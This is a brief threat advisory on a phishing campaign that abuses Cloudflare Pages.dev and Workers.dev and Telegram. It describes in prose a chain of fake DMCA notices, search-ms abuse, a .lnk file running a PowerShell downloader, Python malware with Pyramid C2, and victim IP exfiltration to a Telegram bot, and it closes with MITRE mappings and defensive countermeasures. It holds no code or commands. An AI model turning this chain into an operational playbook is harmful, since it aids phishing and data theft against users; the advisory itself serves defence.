Cloudflare & Telegram Exploited for Stealthy Phishing and Malware Evasion

Credited by Freepik

VTA-004510 – Cloudflare & Telegram Exploited for Stealthy Phishing and Malware Evasion

A Russian-speaking threat actor is leveraging Cloudflare’s services and Telegram to conduct highly deceptive phishing attacks. By abusing Cloudflare’s Pages.dev and Workers.dev, the attackers host fraudulent DMCA takedown notices designed to trick victims into downloading malicious files disguised as PDFs. Once executed, these files initiate an attack chain that exploits the “search-ms” protocol, delivering a Windows shortcut (.lnk) file. This file runs a PowerShell script to retrieve additional payloads, including Python-based malware, from compromised servers.

The malware establishes persistence by creating startup shortcuts and communicates with Pyramid C2 servers, ensuring continued access to infected systems. Additionally, it exfiltrates victim IP addresses to an attacker-controlled Telegram bot, enabling real-time tracking and further exploitation. Despite their technical sophistication, the attackers have made operational security mistakes, leaving open directories exposed, which has allowed researchers to uncover over 20 domains linked to their malicious infrastructure.

Severity:
Medium

Attack Surface:
Email, Endpoint, Infrastructure, Web Application, Web Browser

Tactics:
Command and Control, Defense Evasion, Execution, Exfiltration, Initial Access

Techniques:
T1566 – Spearphishing Link
T1059 – Command and Scripting Interpreter: PowerShell
T1027 – Obfuscated Files or Information
T1102 – Web Service: Bidirectional Communication
T1041 – Exfiltration Over C2 Channel

Indicator of Compromise:
1. https://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2

References:
1. https://gbhackers.com/hackers-exploit-cloudflare/

SuperPRO’s Threat Countermeasures Procedures:
1. Implement advanced phishing protection, including DMARC, DKIM, and SPF, to block phishing emails delivering malicious links.
2. Configure firewalls and web proxies to block access to untrusted Cloudflare Pages.dev and Workers.dev domains.
3. Detect outbound connections to Telegram’s infrastructure, which may indicate exfiltration or command-and-control activity.
4. Configure endpoint security to allow only signed PowerShell scripts and monitor for unusual script execution.
5. Enable attack surface reduction (ASR) rules to block malicious script execution and suspicious process creations.

Contributed by: Carmen